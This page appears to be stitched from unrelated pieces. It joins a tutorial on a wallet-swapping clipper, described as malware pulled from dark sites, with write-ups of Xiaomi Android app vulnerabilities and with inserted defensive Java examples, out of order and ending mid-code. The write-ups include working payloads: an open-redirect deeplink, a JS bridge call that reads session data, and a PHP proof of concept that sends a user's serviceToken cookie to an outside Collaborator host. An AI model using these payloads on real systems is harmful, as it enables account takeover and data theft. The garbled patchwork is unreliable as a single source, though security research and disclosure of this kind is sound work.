Featured

Attention! All information is provided for informational and educational purposes only. The author is not responsible for any possible harm caused by the materials of this article.

Hello everyone! This is HACKFREAKS. Today we are going to write a fairly simple Python clipper example. But first of all, this stuff doesn't belong to me; I pulled it from darksites where someone was selling it. Happy reading!

What is a Clipper

A clipper is a hidden clipboard replacement program. The clipper replaces the wallets / links copied by the user with the wallets / links of the creator.

Example: The victim downloaded a program with a clipper glued into it. The victim launches it, does his business and closes it, but the clipper remains working in the background with no signs of life. After some time, the user decides to transfer money to someone on a QIWI wallet. He copies the desired wallet, and by that time the clipper has already changed the data to its own QIWI wallet. The user pastes the wallet number and transfers the money. At some point, he realizes that the money has gone somewhere else. With a high probability, the user will think that it was his own mistake, and the clipper will remain unsuspected.

Preparation

I think a clipper is one of the simplest pieces of malware you can write. It took me 40 lines of code to make a simple clipper (including comments).

Pyperclip library

pyperclip plays the major role in our clipper. It is the simplest library for working with the clipboard, and its main plus for me is that it is cross-platform. This is really cool: our clipper will work on all OSes, not just Windows.

Installing pyperclip:

Linux / Termux / macOS: pip3 install pyperclip
Windows: pip install pyperclip

We've finished with the library; now let's start writing the code.

We write the Clipper in Python

The very first thing to always do is import the required libraries:

import pyperclip  # Import a library for working with the clipboard
from time import sleep  # Import the sleep function used to pause the program

We have only 2 of them; I have already introduced you to the first one. And from the second, we only import the sleep function, which we need to pause the program.

It's very simple to work with pyperclip:

import pyperclip  # import

Everything is as simple as possible; we continue. The next thing we need to do is create variables with wallets, country codes and so on; here you insert everything individually:

country_code1 = '1'  # 1st country code option

We won't even have functions in the program; we'll write everything without them. The only thing we need is to wrap everything in an endless while True loop, and then just process the contents of the clipboard:

# Endless cycle

This is the main body of our clipper; there is nothing else in the program. Everything is very simple, and if something is not clear, there is a comment for each line.

Complete code

ATTENTION! There is no need to copy the code directly from the article; there may be errors and problems. FULL CODE ON PASTEBIN. Better copy from Pastebin.

That's all. Today we have created the simplest clipper, but it is enough as an example of how such malware works.
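The post above explains the mechanism (poll the clipboard in a loop and swap a copied wallet for another one). What follows is an added example, not code from the post or its author, and it shows the defender's side instead: a detector that takes a polled clipboard trace and flags the one pattern a human never produces by hand, a wallet-like value replaced by a different value of the same kind within a fraction of a second. The trace, the regular expressions and the class names (ClipperDetector, Snapshot, Alert) are constructed for this example; a real monitor would feed it snapshots read from the system clipboard at the same polling interval a clipper uses. It uses Java records, so it needs Java 16 or later.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public class ClipperDetector {
    // Illustrative identifier formats only (assumption: these are the kinds of ids we watch).
    private static final Pattern ETH  = Pattern.compile("^0x[0-9a-fA-F]{40}$");
    private static final Pattern BTC  = Pattern.compile("^(bc1[a-z0-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$");
    private static final Pattern QIWI = Pattern.compile("^\\+?[0-9]{10,15}$"); // phone-number style wallet id

    /** One clipboard poll: when it was taken and what the clipboard held. */
    public record Snapshot(double seconds, String text) {}

    /** A suspected rewrite: which kind of id, what it was, what it became. */
    public record Alert(double seconds, String kind, String before, String after) {}

    static String kind(String s) {
        String t = s.trim();
        if (ETH.matcher(t).matches())  return "eth";
        if (BTC.matcher(t).matches())  return "btc";
        if (QIWI.matcher(t).matches()) return "qiwi";
        return null;
    }

    /**
     * Flags a rewrite when two consecutive snapshots hold different wallet-like values of the
     * same kind and the second arrived within maxGapSeconds of the first. A user copying two
     * different addresses a minute apart is ordinary; a swap 300 ms after the copy is not.
     */
    public static List<Alert> detect(List<Snapshot> trace, double maxGapSeconds) {
        List<Alert> alerts = new ArrayList<>();
        Snapshot prev = null;
        for (Snapshot cur : trace) {
            if (prev != null && !cur.text().equals(prev.text())) {
                String kPrev = kind(prev.text());
                String kCur = kind(cur.text());
                if (kPrev != null && kPrev.equals(kCur)
                        && cur.seconds() - prev.seconds() <= maxGapSeconds) {
                    alerts.add(new Alert(cur.seconds(), kCur, prev.text().trim(), cur.text().trim()));
                }
            }
            prev = cur;
        }
        return alerts;
    }

    public static void main(String[] args) {
        // Constructed trace: the ETH address is swapped 300 ms after being copied, which is
        // flagged; the two phone-style ids are 15 s apart, an ordinary second copy, not flagged.
        List<Snapshot> trace = List.of(
            new Snapshot(0.0,  "hello world"),
            new Snapshot(5.0,  "0x52908400098527886E0F7030069857D2E4169EE7"),
            new Snapshot(5.3,  "0x8617E340B3D01FA5F11F306F4090FD50E238070D"),
            new Snapshot(20.0, "https://example.org/page"),
            new Snapshot(30.0, "+79001234567"),
            new Snapshot(45.0, "+79007654321"));
        for (Alert a : detect(trace, 2.0)) {
            System.out.printf("t=%.1fs %s id rewritten: %s -> %s%n",
                    a.seconds(), a.kind(), a.before(), a.after());
        }
    }
}
```

The same-kind check and the gap threshold are what keep the false-positive rate down: the detector does not care that the clipboard changed, only that one payment identifier became another payment identifier faster than anyone pastes and re-copies.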
Hey Freaks! This is part 2 of my previous article "HACKING XIAOMI'S ANDROID APPS", so without any further delay, let's jump into it. In case you missed part 1 of this article, here's the LINK.

5. Remote WebView hijack using open redirect in Xiaomi Game Center leads to theft of data / privacy violation

This bug exists in the Xiaomi Game Center, which I downloaded from https://game.xiaomi.com. I found an interesting WebView hijack which bypasses the whitelist protection in place. The activity com.xiaomi.gamecenter.ui.webkit.KnightsWebKitActivity is exported and accepts deeplinks of the format migamecenter://openurl:

<activity android:theme="@style/Theme.Light" android:name="com.xiaomi.gamecenter.ui.webkit.KnightsWebKitActivity" android:exported="true">
    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <data android:scheme="migamecenter" android:host="openurl"/>
    </intent-filter>

private boolean c(Intent intent) {
    Uri data;
    <--redacted-->
    if (TextUtils.isEmpty(this.Y) && (data = intent.getData()) != null) {
        String scheme = data.getScheme();
        String host = data.getHost();
        if (TextUtils.equals(scheme, "migamecenter")) {
            if (TextUtils.equals(host, fa)) {
                this.Y = data.toString().substring(23);
            } else if (TextUtils.equals(host, ga)) {
                this.qa = false;
                this.Y = data.toString().substring(26);
            } else {
                this.Y = data.toString();
            }
        } else if (Va.b(data, fa)) {
            String uri = data.toString();
            this.Y = uri.substring((scheme + "://").length() + 15 + 12);
        } else {
            this.Y = data.toString();
        }
    }
    Logger.b("KnightsWebKitActivity", "openurl=" + this.Y);
    Uri uri2 = null;
    if (!TextUtils.isEmpty(this.Y)) {
        uri2 = Uri.parse(this.Y);
    }
    if (!G(this.Y)) { // VALIDATION OF URL HAPPENING HERE
        Log.e("knightsweb", "DENY ACCESS!!! Unsupported url.");
        return false;
    }
    <--redacted-->
    }
    a(uri2, intent);
    }
    return true;
}

At this point, we can try simply loading migamecenter://openurl?www.evil.com and hope that the following line inside the onCreate() function will simply load www.evil.com in our WebView:

this.ka = new KnightsWebView(this, this, this.na, this.Y);

We observe that this fails. Digging deeper, the above function c calls if (!G(this.Y)), which validates that the URL is owned by Xiaomi or related companies. The following function is in com.xiaomi.gamecenter.ui.webkit.Z:

public boolean b(String str) {
    if (h.f11484a) {
        h.a(133205, new Object[]{str});
    }
    if (TextUtils.isEmpty(str)) {
        return false;
    }
    String trim = str.trim();
    if (TextUtils.isEmpty(trim)) {
        return false;
    }
    if (d(trim)) {
        return true;
    }
    try {
        Uri parse = Uri.parse(trim);
        String host = parse.getHost();
        if (TextUtils.isEmpty(host)) {
            return false;
        }
        Logger.b("webkit host=" + host);
        if (host.endsWith(".mi.com") || host.endsWith(".xiaomi.com") || host.endsWith(".wali.com") || host.endsWith(".xiaomi.net") || host.endsWith(".duokan.com") || host.endsWith(".miui.com") || host.endsWith(".mipay.com") || host.endsWith(".duokanbox.com") || TextUtils.equals(host, "mi.com") || TextUtils.equals(host, "xiaomi.com") || host.endsWith(".gov.cn") || host.endsWith("jq.qq.com")) {
            return Va.b(parse.getScheme());
        }
        return false;
    } catch (Throwable th) {
        Logger.a("", th);
    }
}

As you can see, this protection looks robust. The application checks whether the host of the URL to be loaded ends with mi.com, xiaomi.com, duokan.com etc.

Misconfiguration in Game Center's BaseWebViewClient

The KnightsWebView actually sets its WebViewClient to BaseWebViewClient.
Looking at the code for this, we come across the shouldOverrideUrlLoading implementation:

public boolean shouldOverrideUrlLoading(WebView webView, String str) {
    BaseWebView baseWebView2;
    <--redacted-->
    if (isJavaScripUrl(str)) {
        this.mBridgeHandler.sendMessage(this.mBridgeHandler.obtainMessage(256, webView));
        return true;
    }
    <--redacted-->
    } else {
        if (str.startsWith("migamecenter://")) {
            try {
                Intent intent = new Intent("android.intent.action.VIEW");
                intent.setData(Uri.parse(str));
                intent.putExtra("extra_title", m._b);
                Aa.a(webView.getContext(), intent);
            } catch (Exception e2) {
                Log.w("", e2);
            }
            return true;
        }
        boolean e3 = Y.e(str);
        if (!e3) {
            k.b(R.string.unsupported_url_tip);
        }
        return e3;
    }
}
}

Since we are trying to load www.evil.com in our WebView, our URL will fall through to the last statement:

if (!e3) {
    k.b(R.string.unsupported_url_tip);
}
return e3;

Y.e() returns true if the URL is owned by Xiaomi (.mi.com, .xiaomi.com etc.) and has the HTTPS scheme. Since our URL is https://www.evil.com, it will return FALSE. Unfortunately, inside the WebView's shouldOverrideUrlLoading method, returning FALSE means that the WebView will continue to load the URL, and returning TRUE means the WebView will NOT load that URL. Due to this confusion, https://www.evil.com will actually get loaded in the WebView. This means that if we are able to find an open redirect on any of the allowed hosts, the WebView will NOT BLOCK the redirected URL. I will be using the following open redirect with a simple bypass (fixed now):

https://api.music.xiaomi.com/web?url=http://www.evil.com\www.xiaomi.com

JavaScript bridge in Game Center

Game Center implements JS in a very creative (at least in my experience) way and does not use only JavaScript interfaces. It uses a combination of shouldOverrideUrlLoading and a custom Android Handler.
For example, if JS in a page calls JsBridge.invoke("method-name"), the application will load an iframe with source javascript:<JS-CODE>. This will trigger the shouldOverrideUrlLoading behaviour and call the custom handler:

if (isJavaScripUrl(str)) {
    this.mBridgeHandler.sendMessage(this.mBridgeHandler.obtainMessage(256, webView));
    return true;
} else if (str.startsWith(JS_MESSAGE_PREFIX)) {
    Message obtainMessage = this.mBridgeHandler.obtainMessage(257, webView);
    obtainMessage.getData().putString("url", str.substring(str.indexOf(JS_MESSAGE_PREFIX) + 50));
    this.mBridgeHandler.sendMessage(obtainMessage);
    return true;
}

The mentioned handler will look for that Java method inside the com.xiaomi.gamecenter.ui.webkit.BaseWebViewClient class and then invoke() it, as you can see here:

This looks very interesting. Since we are using the getMethod() Java method (java.lang.Class.getMethod() returns a Method object that reflects the specified public member method of the class or interface represented by the Class object), all the methods which are declared as public inside this class can be called in this way by using the above function. Some of these functions include:

public void get_session_data() - this method returns all session data in a JSON object:

public void client_method_execute() - this method executes various other methods, which include READ/WRITE ACCESS TO THE ANDROID CALENDAR without a permission prompt.

So now I have a fair idea of how I can interact with the Java code using JavaScript inside my WebView, but I still don't know how I can do this. To be sure, I could try to read the entire code and work my way backwards to come up with a proper payload, but I instead resorted to further recon inside the Android app.

Many times, I have found that the application will host some of its WebView resources inside the resources directory, which can allow an attacker to read the code and figure out how a locally hosted WebView file might interact with the application. In this case, I was able to extract some very valuable information from resources > assets > js > jsBridge-mix.js, which contained a lot of code involving native WebView to Java interaction. You can find the JS here, to see what I was dealing with.

After understanding the code, I figured out a lot of function calls and what their purpose is. Looking for the get_session_data() from above also showed what a call looks like:

The s() function is basically a modified call to invoke the JS bridge. So now we can build the following payload, which will alert the user's session data to us:

<html>
<body>
<!-- host the jsBridge-mix.js from the resources directory -->
<script src='remote-server/jsBridge-mix.js'></script>
<script>
JsBridge.invoke("get_session_data", {}, function(a) { // the a variable will contain the response JSON object from the Java code
    var i = {};
    i = a;
    window.alert(JSON.stringify(i));
});
</script>
</body>
</html>

Making this attack remote is as easy as using a deeplink in your HTML page and having a user click on it:

<a href='migamecenter://openurl?https://api.music.xiaomi.com/web?url=http://www.evil.com\www.xiaomi.com'>

with the above HTML payload hosted inside. Similarly, I can read the rest of the code and also reverse engineer a payload to execute any method that I want to, like client_method_execute().

That's all for part 2. I will release more of my findings once Xiaomi fixes them. Thanks for reading :)

HACKFREAKS OFFICIAL

Thank you for the attention!
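Two things in this part are worth fixing rather than just exploiting: shouldOverrideUrlLoading returning the allowlist result directly (so a disallowed URL gets loaded), and a bridge that dispatches through Class.getMethod() (so every public method of the client is reachable from page script). Below is an added example, not Xiaomi's code, of a WebViewClient that gets both right. It assumes an app-specific appbridge://<method>?args=<json> scheme for bridge calls and a window.__bridgeResult callback defined by the page; the class name AllowlistWebViewClient and the handler registry are inventions for this example, and it uses the WebResourceRequest overload (API 24 and later).

```java
import android.net.Uri;
import android.webkit.WebResourceRequest;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import org.json.JSONObject;
import java.util.Arrays;
import java.util.List;
import java.util.Map;

public class AllowlistWebViewClient extends WebViewClient {

    /** A bridge method is reachable from page script only if it is registered in the map. */
    public interface BridgeHandler {
        String handle(String jsonArgs);
    }

    // Assumption for this example: bridge calls arrive as appbridge://<method>?args=<json>.
    private static final String BRIDGE_SCHEME = "appbridge";
    // Apex domains taken from the allowlist in the article; subdomains of these are accepted.
    private static final List<String> FIRST_PARTY = Arrays.asList("mi.com", "xiaomi.com");

    private final Map<String, BridgeHandler> handlers;

    public AllowlistWebViewClient(Map<String, BridgeHandler> handlers) {
        this.handlers = handlers;
    }

    /** https only; the host must equal an allowlisted apex or be a dot-separated subdomain of it. */
    static boolean isFirstParty(Uri uri) {
        if (uri == null || !"https".equals(uri.getScheme()) || uri.getHost() == null) {
            return false;
        }
        String host = uri.getHost().toLowerCase();
        for (String apex : FIRST_PARTY) {
            if (host.equals(apex) || host.endsWith("." + apex)) {
                return true;
            }
        }
        return false;
    }

    @Override
    public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
        Uri target = request.getUrl();

        if (BRIDGE_SCHEME.equals(target.getScheme())) {
            // Honour a bridge call only from a first-party page and only for a registered name.
            // No reflection: the callable surface is exactly the key set of the handler map.
            Uri page = view.getUrl() == null ? null : Uri.parse(view.getUrl());
            BridgeHandler handler = handlers.get(target.getHost());
            if (isFirstParty(page) && handler != null) {
                String result = handler.handle(target.getQueryParameter("args"));
                // JSONObject.quote() turns the result into a JS string literal, so the
                // response cannot inject script into the page.
                view.evaluateJavascript(
                        "window.__bridgeResult(" + JSONObject.quote(result) + ")", null);
            }
            return true; // the WebView must never try to load a bridge URL as a page
        }

        // false means "go ahead and load it"; true means "do not load it". The WebView calls
        // this method again for every redirect hop, so an open redirect on an allowed host
        // lands here with the outside URL and is refused instead of loaded.
        return !isFirstParty(target);
    }
}
```

The inversion in the article is the single most common WebView allowlist bug: the check itself is fine, the boolean it returns is the opposite of what the WebView contract expects. Writing the return as "block unless allowed" makes the intent visible at the call site.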
In this blogpost I want to disclose some interesting security issues that I found while researching Xiaomi's assets, which got me to #5 within a month and also the top researcher spot for April and May '21.

Source: takemyhand

1. Stealing users' AuthToken by hijacking WebView in Mi Home

The app exported an activity which loaded an external URL directly from user input. A simple ADB PoC is:

am start -n com.xiaomi.smarthome/com.mi.global.shop.activity.MainTabActivity -d http://tmh/?nativeOpenUrl=www.evil.com

As you can see, my payload is in the nativeOpenUrl parameter. Looking at the code for this activity, it is found that the WebView implements a custom DownloadListener like the following:

this.webView.setDownloadListener(new DownloadListener() {
    public final void onDownloadStart(String str, String str2, String str3, String str4, long j) {
        String str5;
        if (!bhr.O000000o(WebActivity.this.getApplicationContext(), "android.permission.WRITE_EXTERNAL_STORAGE")) {
            bhh.O000000o(WebActivity.this.getApplicationContext(), (int) R.string.storage_permission_error, 1);
            return;
        }
        WebActivity.this.addDownloadListener();
        Context applicationContext = WebActivity.this.getApplicationContext();
        DownloadManager.Request request = new DownloadManager.Request(Uri.parse(str));
        String cookie = CookieManager.getInstance().getCookie(beb.O0000oO);
        bfs O0000o00 = bfs.O0000o00();
        if (O0000o00.O0000o0O()) {
            O0000o00.O00000Oo();
            bec.O000000o.O00000oO();
            if (O0000o00.O000000o(bec.O000000o.O00000o0()) == null) {
                str5 = null;
            } else {
                bec.O000000o.O00000oO();
                str5 = O0000o00.O000000o(bec.O000000o.O00000o0()).authToken;
            }
            cookie = bfc.O000000o("serviceToken", str5, bec.O00000Oo.O000000o, "/" + beb.O0000oo0, (String) null) + cookie;
        }
        bsd.O000000o((Object) cookie);
        request.addRequestHeader("Cookie", cookie);
        request.allowScanningByMediaScanner();
        request.setNotificationVisibility(1);
        if (Build.VERSION.SDK_INT >= 16) {
            request.setAllowedOverMetered(false);
        }
        request.setVisibleInDownloadsUi(true);
        request.setAllowedOverRoaming(true);
        request.setAllowedNetworkTypes(2);
        String guessFileName = URLUtil.guessFileName(str, str3, str4);
        bsd.O000000o((Object) "fileName:".concat(String.valueOf(guessFileName)));
        request.setDestinationInExternalPublicDir(Environment.DIRECTORY_DOWNLOADS, guessFileName);
        ((DownloadManager) applicationContext.getSystemService("download")).enqueue(request);
    }
});

We see that the WebView installs its own handler for whenever a download starts. Further, in the block that builds the cookie string (from CookieManager.getInstance().getCookie(...) down to request.addRequestHeader("Cookie", cookie)), we see that it will attach the user's cookies, including the serviceToken, to the request that the app makes to start the download. Connecting all the dots, we now simply have to create a page that will send a 'downloadable' response to the WebView, and it will send a request with the user's cookies attached. A simple PoC in PHP:

<?php
header('Content-Type: application/pdf');
header("Content-disposition: attachment; filename=\"" . "ameya.html" . "\"");
file_get_contents("http://pvo1ztne9qj33kvlf4edizlhs8yymn.burpcollaborator.net/?exfil=" . $_COOKIE["serviceToken"]);
echo "downloaded";
?>

As can be seen, the server responds with a 'downloadable' HTTP response, and on receiving the next request, sends the user cookie to a Collaborator instance.

Naturally, the next step in the attack was to make it remote. For this, deep links were used. The manifest file revealed that the app will parse any links of the format globalshop://mobile.mi.com?<params>. After some more code review, the following link was crafted:

globalshop://mobile.mi.com?nativeOpenUrl=https://takemyhand.xyz/downloadable_response.html

This link can be used inside an anchor tag of the attacker's web page, and it will execute the full attack.

2. Overly verbose app logs in Xiaomi Market

This bug is nothing fancy, but I think a lot of people might miss this. The Xiaomi Market stored app logs in a public directory, which could have been accessed by any application on the victim's device. This was due to the usage of getExternalFilesDir(), which returns a handle to the /sdcard/Android/data/com.xiaomi.market/files directory where the logs reside. Previously I only restricted myself to checking the /sdcard/ directory without looking inside the app's own private (but public?) directory. Looking for these issues is as simple as grepping for getExternalFilesDir() and not just getExternalStorage(). A simple Java PoC to read the logs out of the directory is:

import android.os.Bundle;
import android.util.Log;
import android.widget.TextView;
import androidx.appcompat.app.AppCompatActivity;
import androidx.core.app.ActivityCompat;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;

public class MainActivity extends AppCompatActivity {
    public static final int PERMISSION_EXTERNAL_STORAGE = 1;

    /* access modifiers changed from: protected */
    @Override // androidx.appcompat.app.AppCompatActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.id.accessibility_custom_action_22);
        ActivityCompat.requestPermissions(this, new String[]{"android.permission.READ_EXTERNAL_STORAGE"}, 1);
        // The log file lives in the app's external files directory, readable by other apps
        File file = new File("/sdcard/Android/data/com.xiaomi.market/files/persist_log1.log");
        StringBuilder text = new StringBuilder();
        try {
            BufferedReader br = new BufferedReader(new FileReader(file));
            while (true) {
                String line = br.readLine();
                if (line == null) {
                    break;
                }
                text.append(line);
                text.append('\n');
            }
            br.close();
        } catch (IOException e2) {
            Log.d("Error reading file", e2.toString());
        }
        ((TextView) findViewById(R.drawable.bg_gameinfo_score_colorful)).setText(text.toString());
    }
}
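For section 1, the defect is that the listener builds a cookie header for the service domain and then attaches it to whatever URL the page asked to download. Here is an added example, not the Mi Home code, of a DownloadListener that keeps the download feature but hands out cookies only when the download URL is on the service host itself, and only the cookies the WebView already holds for that exact URL. SERVICE_HOST is a placeholder and ScopedDownloadListener is a name made up for this example.

```java
import android.app.DownloadManager;
import android.content.Context;
import android.net.Uri;
import android.os.Environment;
import android.webkit.CookieManager;
import android.webkit.DownloadListener;
import android.webkit.URLUtil;

public class ScopedDownloadListener implements DownloadListener {
    // Assumption: the one host whose session cookie this app holds. Placeholder value.
    private static final String SERVICE_HOST = "shop.service.example";

    private final Context appContext;

    public ScopedDownloadListener(Context context) {
        this.appContext = context.getApplicationContext();
    }

    /** Exact host match over https; no suffix matching, no subdomains unless listed here. */
    static boolean isServiceHost(Uri uri) {
        return "https".equals(uri.getScheme()) && SERVICE_HOST.equalsIgnoreCase(uri.getHost());
    }

    @Override
    public void onDownloadStart(String url, String userAgent, String contentDisposition,
                                String mimeType, long contentLength) {
        Uri uri = Uri.parse(url);
        if (!"https".equals(uri.getScheme())) {
            return; // no cleartext, data: or custom-scheme downloads
        }
        DownloadManager.Request request = new DownloadManager.Request(uri);

        if (isServiceHost(uri)) {
            // Cookies scoped by the cookie store to this URL, nothing built by hand from the
            // auth token. A page on any other origin gets a cookie-less download request.
            String cookie = CookieManager.getInstance().getCookie(url);
            if (cookie != null) {
                request.addRequestHeader("Cookie", cookie);
            }
        }

        String fileName = URLUtil.guessFileName(url, contentDisposition, mimeType);
        // Destination as in the original listener: the public Downloads folder.
        request.setDestinationInExternalPublicDir(Environment.DIRECTORY_DOWNLOADS, fileName);
        request.setNotificationVisibility(DownloadManager.Request.VISIBILITY_VISIBLE_NOTIFY_COMPLETED);

        DownloadManager dm = (DownloadManager) appContext.getSystemService(Context.DOWNLOAD_SERVICE);
        dm.enqueue(request);
    }
}
```

The design point is that the download URL comes from page content, so it is attacker-controlled whenever the page is; anything the listener attaches to the request has to be decided by the URL's origin, not by whether the user happens to be logged in.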
3. Task deception using app linking in Mi Music

The manifest file for Mi Music looked like:

<intent-filter>
    <action android:name="android.intent.action.VIEW"/>
    <category android:name="android.intent.category.DEFAULT"/>
    <category android:name="android.intent.category.BROWSABLE"/>
    <!-- redacted -->
    <data android:scheme="miui-music" android:host="web"/>
    <!-- redacted -->
</intent-filter>

Code for the miui-music://web deeplink in com.miui.player.component.HybridUriParser:

public static Intent parseActivity(Context context, Uri uri) {
    if (uri == null || !FeatureConstants.SCHEME.equals(uri.getScheme())) {
        return null;
    }
    String authority = uri.getAuthority();
    IDeviceCompat deviceCompat = IApplicationHelper.CC.getInstance().getDeviceCompat();
    if ("settings".equals(authority)) {
        Intent intent = new Intent(context, deviceCompat.getActivityClass(1));
        intent.setData(uri);
        intent.setPackage(context.getPackageName());
        return intent;
    } else if ("web".equals(authority)) {
        boolean booleanQueryParameter = uri.getBooleanQueryParameter(FeatureConstants.PARAM_BROWSER_VIEW, false);
        String queryParameter = uri.getQueryParameter("url");
        if (!booleanQueryParameter || TextUtils.isEmpty(queryParameter)) {
            return null;
        }
        return new Intent("android.intent.action.VIEW", Uri.parse(queryParameter));
    } else if (!FeatureConstants.AUTHORITY_OUT_BROWSER.equals(authority)) {
        return null;
    } else {
        Intent intent2 = new Intent("android.intent.action.VIEW", Uri.parse(uri.getQueryParameter("url")));
        intent2.setFlags(268435456);
        String queryParameter2 = uri.getQueryParameter(FeatureConstants.PARAM_PACKAGE);
        if (!TextUtils.isEmpty(queryParameter2)) {
            intent2.setPackage(queryParameter2);
        }
        if (!Utils.isIntentExist(context, intent2)) {
            intent2.setPackage(null);
        }
        return intent2;
    }
}

As can be seen, if the deeplink is like miui-music://web/?url=https://www.google.com&browser_view=true, this will launch another intent with data https://www.google.com and action android.intent.action.VIEW. Naturally, this will be opened in the device's browser.

An interesting way to attack such implementations (which are quite common, to prevent malicious links from opening inside the WebView) is to use app links. Android allows the use of app links, which work similarly to deep links. If an app link for my app exists, instead of the URL opening in the browser, my application will be launched on the user's device. So, a custom APK was built, and the following intent filter was added:

<intent-filter android:autoVerify="true">
    <action android:name="android.intent.action.VIEW" />
    <category android:name="android.intent.category.DEFAULT" />
    <category android:name="android.intent.category.BROWSABLE" />
    <data android:path="/deceive.html" android:host="recon.takemyhand.xyz" android:scheme="https" />
</intent-filter>

This means that all intents with data https://recon.takemyhand.xyz/deceive.html will be launched inside my application. If I just add this intent filter, then on using the deeplink miui-music://web/?url=https://recon.takemyhand.xyz/deceive.html&browser_view=true, my app will simply get launched, although without any chance of deceiving the user. To make it 100% convincing, the following intent filter was also added inside the app:

<intent-filter>
    <action android:name="android.intent.action.VIEW"/>
    <category android:name="android.intent.category.DEFAULT"/>
    <category android:name="android.intent.category.BROWSABLE"/>
    <!-- redacted -->
    <data android:scheme="miui-music" android:host="web"/>
    <!-- redacted -->
</intent-filter>

This will let the user choose an application when launching the deeplink miui-music://web/?url=https://recon.takemyhand.xyz/deceive.html&browser_view=true. Even when the user clicks on Mi Music in the intent picker, it will launch the custom APK's activity, since an app link is declared in the application.
Lastly, I also signed my APK and used the SHA-256 fingerprint to generate my own assetlinks.json file on my website, which allows Android to open the custom application every time instead of the browser. Even when the user chooses Mi Music to open the deeplink, he will be taken to the malicious activity. Since the launchMode of the activity inside Mi Music is set to singleTask, the malicious activity will be launched inside the Mi Music app's task (a task affinity can be set in the malicious application), making it impossible for the victim to suspect an attack. This can lead to very easy theft of credentials, as shown below.

https://gifyu.com/image/Grlt

The simple fix was to specify the browser package in com.miui.player.component.HybridUriParser when launching the browser intent.

4. Remote WebView hijack to exfiltrate data in Mi Music

In the AndroidManifest.xml file you can see that com.miui.player.ui.MusicBrowserActivity processes deeplinks:

<intent-filter>
    <action android:name="android.intent.action.VIEW"/>
    <category android:name="android.intent.category.DEFAULT"/>
    <category android:name="android.intent.category.BROWSABLE"/>
    <data android:scheme="miui-music" android:host="play"/>
    <data android:scheme="miui-music" android:host="view"/>
    <data android:scheme="miui-music" android:host="detail"/>
    <data android:scheme="miui-music" android:host="home"/>
    <data android:scheme="miui-music" android:host="search"/>
    <data android:scheme="miui-music" android:host="artist"/>
    <data android:scheme="miui-music" android:host="more"/>
    <data android:scheme="miui-music" android:host="web"/>
    <data android:scheme="miui-music" android:host="playback"/>
    <data android:scheme="miui-music" android:host="settings"/>
    <data android:scheme="miui-music" android:host="service"/>
    <data android:scheme="http" android:host="app.music.xiaomi.com"/>
    <data android:scheme="https" android:host="app.music.xiaomi.com"/>
    <data android:scheme="http" android:host="app.fm.duokanbox.com"/>
    <data android:scheme="https" android:host="app.fm.duokanbox.com"/>
    <data android:scheme="miui-music" android:host="artist_list"/>
    <data android:scheme="miui-music" android:host="display"/>
    <data android:scheme="miui-music" android:host="global_music"/>
    <data android:scheme="miui-music" android:host="hungama_payment"/>
</intent-filter>

Looking at the code for com.miui.player.ui.MusicBrowserActivity shows a function called dispatch:

public boolean dispatch(Intent intent, boolean z) {
    MusicLog.i(TAG, "dispatch uri: " + intent.getData());
    if (PrivacyCheckHelper.isAgreeMusicPrivacy() || canIgnorePrivacy(intent) || PrivacyCheckHelper.isSkipMusicUserTerm()) {
        MediaPlaybackServiceProxy mediaPlaybackServiceProxy = this.mPlaybackService;
        if (mediaPlaybackServiceProxy == null) {
            MusicLog.e(TAG, "mPlaybackService is NULL, skip this dispatch");
            return false;
        }
        if (!mediaPlaybackServiceProxy.hasService()) {
            this.mHandler.sendEmptyMessageDelayed(2, 1500);
        }
        Uri parseData = parseData(intent);
        MusicLog.i(TAG, "open uri, uri=" + parseData);
        if (parseData != null) {
            try {
                if (!TextUtils.isEmpty(parseData.getQueryParameter(FeatureConstants.PARAM_PAY_RESULT))) {
                    this.mFragmentCenter.removeTopFragment();
                }
            } catch (UnsupportedOperationException unused) {
                MusicLog.i(TAG, "dispatch, UnsupportedOperationException uri:" + parseData);
            }
        }
        String queryParameter = parseData != null ? parseData.getQueryParameter(FeatureConstants.PARAM_REF) : null;
        if (TextUtils.isEmpty(queryParameter)) {
            queryParameter = "normal";
        }
        checkOpenOnlineService(queryParameter);
        PlayableList parseService = HybridUriParser.parseService(parseData);
        if (parseService != null) {
            parseService.getQueueDetail().miRef = queryParameter;
            playByServiceAndShow(parseService, parseData);
            return true;
        }
        playSongsIfNeed(parseData, queryParameter);
        Intent parseActivity = HybridUriParser.parseActivity(this, parseData);
        if (parseActivity != null) {
            Bundle extras = intent.getExtras();
            if (extras != null) {
                parseActivity.putExtras(extras);
            }
            try {
                super.startActivity(parseActivity);
            } catch (Exception e) {
                Crashlytics.logException(e);
                MusicLog.e(TAG, "startActivity Exception:" + e);
            }
            return true;
        }
        FragmentInfo parseFragment = HybridUriParser.parseFragment(parseData);
        if (parseFragment == null && !z) {
            parseFragment = HybridUriParser.home();
        }
        if (parseFragment != null) {
            MusicLog.i(TAG, "startFragment ");
            parseFragment.mArgs = intent.getExtras();
            MusicTrace.beginTrace(TAG, "startFragment");
            this.mFragmentCenter.start(parseFragment);
            MusicTrace.endTrace();
            return true;
        }
        MusicLog.i(TAG, "unhandle intent");
        return false;
    }
    showPrivacyPage();
    return false;
}

Uri parseData = parseData(intent); parses the intent, and the result is passed to parseFragment() in the last branch inside dispatch. The code for parseFragment:

public static FragmentInfo parseFragment(Uri uri) {
    if (uri == null || !FeatureConstants.SCHEME.equals(uri.getScheme())) {
        return null;
    }
    IDeviceCompat deviceCompat = IApplicationHelper.CC.getInstance().getDeviceCompat();
    Uri adapter = DisplayCompact.adapter(uri);
    if (adapter == null) {
        return null;
    }
    IAppInstance.CC.getInstance().OnlineServiceHelperCheckOnlineUriAndOpenSwitch(IApplicationHelper.CC.getInstance().getContext(), adapter);
    String authority = adapter.getAuthority();
    if ("display".equals(authority) || FeatureConstants.AUTHORITY_FOLDER_PICKER.equals(authority)) {
        // redacted
    } else if (FeatureConstants.AUTHORITY_HUNGAMA_PAYMENT.equals(authority)) {
        // redacted
    } else if ("webview".equals(authority)) {
